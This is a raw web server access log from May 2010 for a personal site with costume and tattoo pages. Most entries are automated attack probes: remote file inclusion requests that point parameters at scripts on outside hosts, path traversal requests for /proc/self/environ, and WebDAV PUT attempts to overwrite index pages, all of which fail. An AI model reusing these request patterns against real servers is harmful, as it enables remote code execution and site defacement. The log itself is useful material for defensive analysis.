222.231.60.209 - - [03/May/2010:10:00:37 -0500] "GET /logs/allinurl:mod.php?mod=siteinfo&id=http://incesp.com/uranus/id1.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
222.231.60.209 - - [03/May/2010:10:00:37 -0500] "GET /logs/access_log.1229040000/allinurl:mod.php?mod=siteinfo&id=http://incesp.com/uranus/id1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
222.231.60.209 - - [03/May/2010:10:00:37 -0500] "GET /allinurl:mod.php?mod=siteinfo&id=http://incesp.com/uranus/id1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
81.177.33.14 - - [03/May/2010:10:01:21 -0500] "GET //main.php?sayfa=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
81.177.33.14 - - [03/May/2010:10:01:21 -0500] "GET /logs//main.php?sayfa=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
81.177.33.14 - - [03/May/2010:10:01:21 -0500] "GET /logs/access_log.1270598400%20%20//main.php?sayfa=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
74.86.210.130 - - [03/May/2010:10:01:34 -0500] "GET /logs/access_log.1268611200/index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
74.86.210.130 - - [03/May/2010:10:01:35 -0500] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
74.86.210.130 - - [03/May/2010:10:01:35 -0500] "GET /logs/index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
78.110.50.139 - - [03/May/2010:10:01:57 -0500] "GET /logs//uigaproxy/include/template.php?content=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
78.110.50.139 - - [03/May/2010:10:01:57 -0500] "GET //uigaproxy/include/template.php?content=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
78.110.50.139 - - [03/May/2010:10:01:57 -0500] "GET /logs/access_log.1270598400//uigaproxy/include/template.php?content=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
78.110.50.139 - - [03/May/2010:10:02:12 -0500] "GET /logs/access_log.1270598400//uigaproxy/include/template.php?content=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
78.110.50.139 - - [03/May/2010:10:02:12 -0500] "GET //uigaproxy/include/template.php?content=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
78.110.50.139 - - [03/May/2010:10:02:12 -0500] "GET /logs//uigaproxy/include/template.php?content=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
207.46.199.55 - - [03/May/2010:10:03:54 -0500] "GET /logs/access_log.1235606400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
81.177.33.14 - - [03/May/2010:10:06:20 -0500] "GET /logs/access_log.1262995200/old_reports.php?file=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
81.177.33.14 - - [03/May/2010:10:06:20 -0500] "GET /logs/old_reports.php?file=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 304 "-""Mozilla/5.0"
81.177.33.14 - - [03/May/2010:10:06:20 -0500] "GET /old_reports.php?file=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
81.177.33.14 - - [03/May/2010:10:06:20 -0500] "GET /logs/access_log.1265414400/old_reports.php?file=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
91.76.96.22 - - [03/May/2010:10:06:25 -0500] "GET /costume/links.htm HTTP/1.1" 200 1029 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( )"
91.76.96.22 - - [03/May/2010:10:06:31 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( )"
91.76.96.22 - - [03/May/2010:10:06:41 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( )"
81.177.33.14 - - [03/May/2010:10:06:42 -0500] "GET /old_reports.php?file=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
81.177.33.14 - - [03/May/2010:10:06:42 -0500] "GET /logs/old_reports.php?file=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 304 "-""Mozilla/5.0"
81.177.33.14 - - [03/May/2010:10:06:42 -0500] "GET /logs/access_log.1265414400/old_reports.php?file=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
81.177.33.14 - - [03/May/2010:10:06:42 -0500] "GET /logs/access_log.1262995200/old_reports.php?file=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
166.137.14.113 - - [03/May/2010:10:09:21 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "-""Bing/1.1 CFNetwork/459 Darwin/10.0.0d3"
67.19.33.58 - - [03/May/2010:10:12:58 -0500] "GET /mcf.php?content=http://www.sunmulwang.com/bbs/kboard/data/freeboard/image1.jpg??? HTTP/1.1" 404 291 "-""Mozilla/5.0"
67.19.33.58 - - [03/May/2010:10:12:58 -0500] "GET /logs/access_log.1215993600/mcf.php?content=http://www.sunmulwang.com/bbs/kboard/data/freeboard/image1.jpg??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
67.19.33.58 - - [03/May/2010:10:12:58 -0500] "GET /logs/mcf.php?content=http://www.sunmulwang.com/bbs/kboard/data/freeboard/image1.jpg??? HTTP/1.1" 404 296 "-""Mozilla/5.0"
87.230.93.112 - - [03/May/2010:10:15:32 -0500] "GET /mcf.php?content=http://www.sunmulwang.com/bbs/kboard/data/freeboard/image1.jpg??? HTTP/1.1" 404 291 "-""Mozilla/5.0"
87.230.93.112 - - [03/May/2010:10:15:32 -0500] "GET /logs/mcf.php?content=http://www.sunmulwang.com/bbs/kboard/data/freeboard/image1.jpg??? HTTP/1.1" 404 296 "-""Mozilla/5.0"
87.230.93.112 - - [03/May/2010:10:15:32 -0500] "GET /logs/access_log.1215993600/mcf.php?content=http://www.sunmulwang.com/bbs/kboard/data/freeboard/image1.jpg??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
87.230.93.112 - - [03/May/2010:10:15:47 -0500] "GET /logs/access_log.1229731200/mcf.php?content=http://www.sunmulwang.com/bbs/kboard/data/freeboard/image1.jpg??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
81.177.33.14 - - [03/May/2010:10:18:36 -0500] "GET /logs//main.php?sayfa=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
81.177.33.14 - - [03/May/2010:10:18:36 -0500] "GET //main.php?sayfa=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
81.177.33.14 - - [03/May/2010:10:18:36 -0500] "GET /logs/access_log.1270598400%20%20//main.php?sayfa=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
81.177.33.14 - - [03/May/2010:10:19:08 -0500] "GET /logs//main.php?sayfa=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
81.177.33.14 - - [03/May/2010:10:19:08 -0500] "GET /logs/access_log.1270598400%20%20//main.php?sayfa=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
81.177.33.14 - - [03/May/2010:10:19:08 -0500] "GET //main.php?sayfa=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
67.195.112.180 - - [03/May/2010:10:19:24 -0500] "GET /logs/access_log.1228003200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.204.237 - - [03/May/2010:10:19:54 -0500] "GET /logs/access_log.1250035200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
81.177.33.14 - - [03/May/2010:10:22:21 -0500] "GET /logs/access_log.1270598400%20%20//main.php?sayfa=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
81.177.33.14 - - [03/May/2010:10:22:21 -0500] "GET //main.php?sayfa=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
81.177.33.14 - - [03/May/2010:10:22:21 -0500] "GET /logs//main.php?sayfa=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
67.19.33.58 - - [03/May/2010:10:23:47 -0500] "GET /logs/access_log.1229731200%20%20/mcf.php?content=http://www.sunmulwang.com/bbs/kboard/data/freeboard/image1.jpg??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
67.19.33.58 - - [03/May/2010:10:23:47 -0500] "GET /logs/access_log.1213401600%20%20/mcf.php?content=http://www.sunmulwang.com/bbs/kboard/data/freeboard/image1.jpg??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
187.45.193.159 - - [03/May/2010:10:23:58 -0500] "GET /logs/access_log.1270598400///index.php?option=com_flyspray&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.805"
187.45.193.159 - - [03/May/2010:10:23:58 -0500] "GET ///index.php?option=com_flyspray&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
187.45.193.159 - - [03/May/2010:10:23:59 -0500] "GET /logs///index.php?option=com_flyspray&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.805"
202.125.152.246 - - [03/May/2010:10:24:14 -0500] "GET /mcf.php?content=http://www.sunmulwang.com/bbs/kboard/data/freeboard/image1.jpg??? HTTP/1.1" 404 291 "-""Mozilla/5.0"
202.125.152.246 - - [03/May/2010:10:24:14 -0500] "GET /logs/access_log.1215993600/mcf.php?content=http://www.sunmulwang.com/bbs/kboard/data/freeboard/image1.jpg??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
202.125.152.246 - - [03/May/2010:10:24:14 -0500] "GET /logs/mcf.php?content=http://www.sunmulwang.com/bbs/kboard/data/freeboard/image1.jpg??? HTTP/1.1" 404 296 "-""Mozilla/5.0"
202.125.152.246 - - [03/May/2010:10:24:14 -0500] "GET /logs/access_log.1229731200/mcf.php?content=http://www.sunmulwang.com/bbs/kboard/data/freeboard/image1.jpg??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
121.190.102.21 - - [03/May/2010:10:24:57 -0500] "GET //main.php?sayfa=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
121.190.102.21 - - [03/May/2010:10:25:06 -0500] "GET /logs//main.php?sayfa=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
121.190.102.21 - - [03/May/2010:10:25:06 -0500] "GET /logs/access_log.1270857600%20%20//main.php?sayfa=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
121.190.102.21 - - [03/May/2010:10:25:48 -0500] "GET /logs/access_log.1229731200%20%20//main.php?sayfa=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
87.250.255.243 - - [03/May/2010:10:25:58 -0500] "GET /logs/access_log.1268870400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
198.60.180.151 - - [03/May/2010:10:31:21 -0500] "GET /costume/ HTTP/1.1" 200 640 "http://199.104.212.139/maryvale/drama.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)"
198.60.180.151 - - [03/May/2010:10:31:21 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)"
198.60.180.151 - - [03/May/2010:10:31:24 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 2651 "http://tomdolan.pconline.com/costume/""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)"
198.60.180.151 - - [03/May/2010:10:31:24 -0500] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)"
198.60.180.151 - - [03/May/2010:10:31:24 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)"
198.60.180.151 - - [03/May/2010:10:31:24 -0500] "GET /costume/history5.gif HTTP/1.1" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)"
198.60.180.151 - - [03/May/2010:10:31:26 -0500] "GET /costume/costume2.htm HTTP/1.1" 200 1799 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)"
81.177.33.14 - - [03/May/2010:10:31:51 -0500] "GET /logs//main.php?sayfa=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
81.177.33.14 - - [03/May/2010:10:31:51 -0500] "GET //main.php?sayfa=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
81.177.33.14 - - [03/May/2010:10:31:51 -0500] "GET /logs/access_log.1270598400%20%20//main.php?sayfa=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
121.190.102.21 - - [03/May/2010:10:32:43 -0500] "GET //galeria.php?start=0&kategoria=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 296 "-""Mozilla/5.0"
121.190.102.21 - - [03/May/2010:10:32:43 -0500] "GET /logs/access_log.1266019200//galeria.php?start=0&kategoria=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
121.190.102.21 - - [03/May/2010:10:32:43 -0500] "GET /logs//galeria.php?start=0&kategoria=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 301 "-""Mozilla/5.0"
207.46.13.52 - - [03/May/2010:10:39:54 -0500] "GET /logs/access_log.1217721600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.195.232 - - [03/May/2010:10:41:54 -0500] "GET /logs/access_log.1203033600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
216.131.91.180 - - [03/May/2010:10:41:55 -0500] "GET /logs/access_log.1270857600%20%20//main.php?sayfa=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
216.131.91.180 - - [03/May/2010:10:41:55 -0500] "GET /logs//main.php?sayfa=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
216.131.91.180 - - [03/May/2010:10:41:55 -0500] "GET //main.php?sayfa=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
216.131.91.180 - - [03/May/2010:10:42:05 -0500] "GET //main.php?sayfa=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
216.131.91.180 - - [03/May/2010:10:42:05 -0500] "GET /logs//main.php?sayfa=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
216.131.91.180 - - [03/May/2010:10:42:05 -0500] "GET /logs/access_log.1270857600%20%20//main.php?sayfa=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
216.131.91.180 - - [03/May/2010:10:42:33 -0500] "GET /logs/access_log.1229731200%20%20//main.php?sayfa=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
216.131.91.180 - - [03/May/2010:10:42:40 -0500] "GET /logs/access_log.1229731200%20%20//main.php?sayfa=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
81.177.33.14 - - [03/May/2010:10:45:32 -0500] "GET /logs/access_log.1270598400%20%20//main.php?sayfa=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
81.177.33.14 - - [03/May/2010:10:45:32 -0500] "GET /logs//main.php?sayfa=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
81.177.33.14 - - [03/May/2010:10:45:32 -0500] "GET //main.php?sayfa=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
67.218.116.134 - - [03/May/2010:10:45:38 -0500] "GET /logs/access_log.1217030400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
189.38.90.54 - - [03/May/2010:10:46:26 -0500] "PUT /index.htm HTTP/1.1" 405 316 "-""Microsoft Data Access Internet Publishing Provider DAV 1.1"
189.38.90.54 - - [03/May/2010:10:46:26 -0500] "PUT /index.html HTTP/1.1" 405 317 "-""Microsoft Data Access Internet Publishing Provider DAV 1.1"
189.38.90.54 - - [03/May/2010:10:46:26 -0500] "PUT /welcome.htm HTTP/1.1" 405 318 "-""Microsoft Data Access Internet Publishing Provider DAV 1.1"
189.38.90.54 - - [03/May/2010:10:46:27 -0500] "PUT /welcome.html HTTP/1.1" 405 319 "-""Microsoft Data Access Internet Publishing Provider DAV 1.1"
189.38.90.54 - - [03/May/2010:10:46:27 -0500] "PUT /home.htm HTTP/1.1" 405 315 "-""Microsoft Data Access Internet Publishing Provider DAV 1.1"
189.38.90.54 - - [03/May/2010:10:46:27 -0500] "PUT /home.html HTTP/1.1" 405 316 "-""Microsoft Data Access Internet Publishing Provider DAV 1.1"
189.38.90.54 - - [03/May/2010:10:46:27 -0500] "PUT /index.aspx HTTP/1.1" 405 317 "-""Microsoft Data Access Internet Publishing Provider DAV 1.1"
189.38.90.54 - - [03/May/2010:10:46:27 -0500] "PUT /defaut.aspx HTTP/1.1" 405 318 "-""Microsoft Data Access Internet Publishing Provider DAV 1.1"
189.38.90.54 - - [03/May/2010:10:46:28 -0500] "PUT /home.aspx HTTP/1.1" 405 316 "-""Microsoft Data Access Internet Publishing Provider DAV 1.1"
189.38.90.54 - - [03/May/2010:10:46:28 -0500] "PUT /default.htm HTTP/1.1" 405 318 "-""Microsoft Data Access Internet Publishing Provider DAV 1.1"
189.38.90.54 - - [03/May/2010:10:46:28 -0500] "PUT /default.html HTTP/1.1" 405 319 "-""Microsoft Data Access Internet Publishing Provider DAV 1.1"
189.38.90.54 - - [03/May/2010:10:46:28 -0500] "PUT /index.asp HTTP/1.1" 405 316 "-""Microsoft Data Access Internet Publishing Provider DAV 1.1"
189.38.90.54 - - [03/May/2010:10:46:29 -0500] "PUT /main.htm HTTP/1.1" 405 315 "-""Microsoft Data Access Internet Publishing Provider DAV 1.1"
189.38.90.54 - - [03/May/2010:10:46:29 -0500] "PUT /iisstart.asp HTTP/1.1" 405 319 "-""Microsoft Data Access Internet Publishing Provider DAV 1.1"
189.38.90.54 - - [03/May/2010:10:46:29 -0500] "PUT /main.html HTTP/1.1" 405 316 "-""Microsoft Data Access Internet Publishing Provider DAV 1.1"
189.38.90.54 - - [03/May/2010:10:46:29 -0500] "PUT /main.asp HTTP/1.1" 405 315 "-""Microsoft Data Access Internet Publishing Provider DAV 1.1"
189.38.90.54 - - [03/May/2010:10:46:29 -0500] "PUT /main.aspx HTTP/1.1" 405 316 "-""Microsoft Data Access Internet Publishing Provider DAV 1.1"
189.38.90.54 - - [03/May/2010:10:46:30 -0500] "PUT /default.asp HTTP/1.1" 405 318 "-""Microsoft Data Access Internet Publishing Provider DAV 1.1"
189.38.90.54 - - [03/May/2010:10:46:30 -0500] "PUT /home.asp HTTP/1.1" 405 315 "-""Microsoft Data Access Internet Publishing Provider DAV 1.1"
189.38.90.54 - - [03/May/2010:10:46:30 -0500] "PUT /index.php HTTP/1.1" 405 316 "-""Microsoft Data Access Internet Publishing Provider DAV 1.1"
189.38.90.54 - - [03/May/2010:10:46:30 -0500] "PUT /default.php HTTP/1.1" 405 318 "-""Microsoft Data Access Internet Publishing Provider DAV 1.1"
189.38.90.54 - - [03/May/2010:10:46:31 -0500] "PUT /home.php HTTP/1.1" 405 315 "-""Microsoft Data Access Internet Publishing Provider DAV 1.1"
189.38.90.54 - - [03/May/2010:10:46:31 -0500] "PUT /iisstart.asp HTTP/1.1" 405 319 "-""Microsoft Data Access Internet Publishing Provider DAV 1.1"
189.38.90.54 - - [03/May/2010:10:46:31 -0500] "PUT /localstart.asp HTTP/1.1" 405 321 "-""Microsoft Data Access Internet Publishing Provider DAV 1.1"
189.38.90.54 - - [03/May/2010:10:46:31 -0500] "PUT /Entrada.asp HTTP/1.1" 405 318 "-""Microsoft Data Access Internet Publishing Provider DAV 1.1"
189.38.90.54 - - [03/May/2010:10:46:32 -0500] "GET / HTTP/1.1" 200 1003 "-""libwww-perl/5.808"
207.46.13.137 - - [03/May/2010:10:56:25 -0500] "GET /logs/access_log.1221955200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
91.121.18.166 - - [03/May/2010:10:57:35 -0500] "GET //index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
91.121.18.166 - - [03/May/2010:10:57:35 -0500] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
91.121.18.166 - - [03/May/2010:10:57:35 -0500] "GET /logs/access_log.1268611200//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
91.121.18.166 - - [03/May/2010:10:57:49 -0500] "GET //index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
91.121.18.166 - - [03/May/2010:10:57:49 -0500] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
91.121.18.166 - - [03/May/2010:10:57:49 -0500] "GET /logs/access_log.1268611200//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
207.46.13.90 - - [03/May/2010:11:00:54 -0500] "GET /logs/access_log.1220313600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.134 - - [03/May/2010:11:01:24 -0500] "GET /logs/access_log.1170720000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
62.28.102.242 - - [03/May/2010:11:05:44 -0500] "GET /logs//skin/zae_plan/view_foot.php/write.php?dir=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
62.28.102.242 - - [03/May/2010:11:05:44 -0500] "GET //skin/zae_plan/view_foot.php/write.php?dir=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
62.28.102.242 - - [03/May/2010:11:05:44 -0500] "GET /logs/access_log.1262304000//skin/zae_plan/view_foot.php/write.php?dir=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 349 "-""Mozilla/5.0"
62.28.102.242 - - [03/May/2010:11:05:44 -0500] "GET /logs/access_log.1265500800//skin/zae_plan/view_foot.php/write.php?dir=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 349 "-""Mozilla/5.0"
62.28.102.242 - - [03/May/2010:11:05:47 -0500] "GET /logs//skin/zae_plan/view_foot.php/write.php?dir=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
62.28.102.242 - - [03/May/2010:11:05:47 -0500] "GET /logs/access_log.1265500800//skin/zae_plan/view_foot.php/write.php?dir=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 349 "-""Mozilla/5.0"
62.28.102.242 - - [03/May/2010:11:05:47 -0500] "GET //skin/zae_plan/view_foot.php/write.php?dir=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
62.28.102.242 - - [03/May/2010:11:05:48 -0500] "GET /logs/access_log.1262304000//skin/zae_plan/view_foot.php/write.php?dir=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 349 "-""Mozilla/5.0"
62.28.102.242 - - [03/May/2010:11:06:05 -0500] "GET /logs//skin/zae_plan/view_foot.php/write.php?dir=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
62.28.102.242 - - [03/May/2010:11:06:05 -0500] "GET //skin/zae_plan/view_foot.php/write.php?dir=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
62.28.102.242 - - [03/May/2010:11:06:05 -0500] "GET /logs/access_log.1262390400//skin/zae_plan/view_foot.php/write.php?dir=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 349 "-""Mozilla/5.0"
62.28.102.242 - - [03/May/2010:11:06:05 -0500] "GET /logs/access_log.1262304000//skin/zae_plan/view_foot.php/write.php?dir=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 349 "-""Mozilla/5.0"
114.141.2.7 - - [03/May/2010:11:06:26 -0500] "GET /logs//skin/zae_plan/view_foot.php/write.php?dir=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
